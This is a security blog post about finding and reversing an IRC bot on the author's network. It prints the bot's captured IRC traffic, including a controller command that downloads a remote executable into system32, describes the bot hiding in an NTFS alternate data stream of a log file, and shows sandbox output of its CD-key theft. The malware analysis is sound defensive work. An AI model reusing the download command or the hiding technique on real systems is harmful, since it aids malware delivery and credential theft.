When I logged into my sensornet this morning I excitingly saw the following info in my logs:
-> PASS D3&hh*
-> USER CC-5644 * 0 :IMP1
-> NICK [T11|USA|51932]
<- :sv2.bothost.net 001 [T11|USA|51932] :
<- :sv2.bothost.net 002 [T11|USA|51932] :
<- :sv2.bothost.net 003 [T11|USA|51932] :
-> JOIN ##tshuab l3a9
<- :sv2.bothost.net 442 [T11|USA|51932] ##tshaub l3a9
<- :sv2.bothost.net 443 [T11|USA|51932] ##tshaub 6h057
<- :sv2.bothost.net NOTICE [T11|USA|51932] :*** You were forced to join ##gt
<- :sv2.bothost.net 442 [T11|USA|51932] ##gt : .get http://www.net.nu/tort.exe C:\WINDOWS\system32\tdmk.exe r h
Ever go up to someone wearing camo and say something dumb like, "I can’t see you" I got punched in the head one time for that. (I didn’t know Brad Reese was so sensitive about his wardrobe...) I have been to a ton of hacker conventions and it is easy to spot the noobs, because they tend to brute force their way into systems. They are more noisy then a houseful of roosters at sunrise on the wire plus they break many file dependencies to install their own crapware. This type of behavior is great for doing firewall/IDS demos and in Hollywood but with respect to them, in a demo or movie, time is our enemy so we have to get to the point. But please do not confuse demos-movies with reality, unless it is Star Trek or The Force cause could happen! Time is on the side of the hacker/bothearder. To keep that advantage, they have to hide in plain site.
I could not find this bot on my system so I started looking for ADS (Alternative Data Streams). I used Microsoft’s STREAMS tool to find it. STREAMS is cool, since it is coded up by Mark Russinovich so I know it’s going to work. Sure enough it did.
C:\windows\streams –s c:\windows
Streams v1.56 – Enumerate alternate NTFS data streams
Copyright © 199-2007 Mark Russinovich
Sysinternals – www.sysinternals.com
C:\windows\kb923624.log:
tdmk.exe:$DATA 120320
And there it is! With ADS they did not have to use the old using a zero to look like an O trick. Nope, they just a normal system file and hide the bot inside it, a kb log file no less! Take a look in your Windows directory and see how many of those you have... I connected to my server with my “ReverseTop” (a laptop I use only for reversing, I know, I know, I’m quite a wordsmith but alas my love is for the binary and not fer that there grammar stuff) I ran this thru DUMPBIN to dump the headers and true to form like most bots it is packaged with a run time packer. This one was packed with Petite. A little more work back and forth compression-decompression, IA32 Assembly reading plus the use of another Russinovich tool called Process Explorer, and I found this was a CD Key stealer. I activated it in a sandbox and I caught the following:
<@controller>.getcdkeys
<+[USA]51923> Microsoft Windows Product ID CD Key: xxxxxxxxx
<+[USA]51923> Half Life (Blue Shift) Product CD Key: xxxxxxx
<+[USA]51923> [CDKEYS] Search Completed
Half Life! ...how did that get there...ummm...must be my sons...
I have always enjoyed chasing clues and finding things hiding in plain site. Da Vinci Code, National Treasure, Backward masking, Symbology all that stuff is a real hoot to me! And it just doesn’t get any better then tracking and reversing bots! Now, if I could just grow my hair like Tom Hanks in a Robert Langdon style...
By the way... Check out my way cool new podcast series! This is where I speak with folks in the know that are really changing the face of networking today. This week I spoke with Scott Cunningham of Radianta. Check it out:
http://www.networkworld.com/podcasts/geektogeek/
Jimmy Ray Purser
Jimmy Ray Purser is the technical co-host for Cisco's TechWise and BizWise TV. Jimmy Ray also conducts advanced training for engineers across North America and Europe and regularly speaks at industry conferences such as VON, CeBIT, N+I, and Networkers. As a field engineer, Jimmy Ray experiences networking first hand behind the console or in the rack. He is an active member in the IEEE and the Ethernet Alliance and has designed, installed and tested numerous networks for Fortune 500 companies, the United States military and other institutions worldwide. He holds 3 U.S. patents for Ethernet security algorithms with two others pending and one defensive publication, as well as numerous other vendor certifications in networking and security.
Purser holds a Bachelor of Science degree in electrical engineering from Southern Illinois University is currently pursuing a master of science degree in electrical engineering.
The Leader in Network Knowledge
IUN/HP
It's cool seeing an author you met and talked with many years ago (IUN/HP). I enjoy your writing focus, style, and goals; security + attitude = hackers behind bars.
Post new comment